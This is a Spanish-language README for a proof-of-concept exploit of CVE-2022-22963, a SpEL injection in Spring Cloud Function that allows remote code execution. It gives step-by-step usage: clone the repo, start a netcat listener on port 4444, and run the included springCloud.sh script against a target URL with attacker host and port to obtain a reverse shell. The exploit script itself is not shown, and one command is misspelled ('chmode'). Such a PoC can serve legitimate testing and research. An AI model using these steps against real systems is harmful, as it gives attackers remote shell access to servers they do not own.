
Exploit de prueba de concepto para CVE-2022-22963, una inyección SpEL en Spring Cloud Function que conduce a la ejecución remota de código. Incluye un script de shell para explotación automatizada con payload de reverse shell.
En las versiones 3.1.6, 3.2.2 y versiones anteriores de Spring Cloud Function, al utilizar la funcionalidad de enrutamiento es posible que un usuario proporcione un SpEL especialmente diseñado como una expresión de enrutamiento que puede resultar en la ejecución remota de código y el acceso a recursos locales.
Clona el repositorio
git clone https://github.com/jrbH4CK/CVE-2022-22963.git
Ingresa a la carpeta
cd CVE-2022-22963
Cambia los permisos de ejecución
chmode +x springCloud.sh
Inicia nc por el puerto deseado
nc -nlvp 4444
Ejecuta el comando siguiente cambiando los parametros de acuerdo a tus necesidades
./springCloud.sh url lhost lport
NOTA: El uso de este repositorio es responsabilidad de quien lo utiliza y no del autor, solo con fines educativos.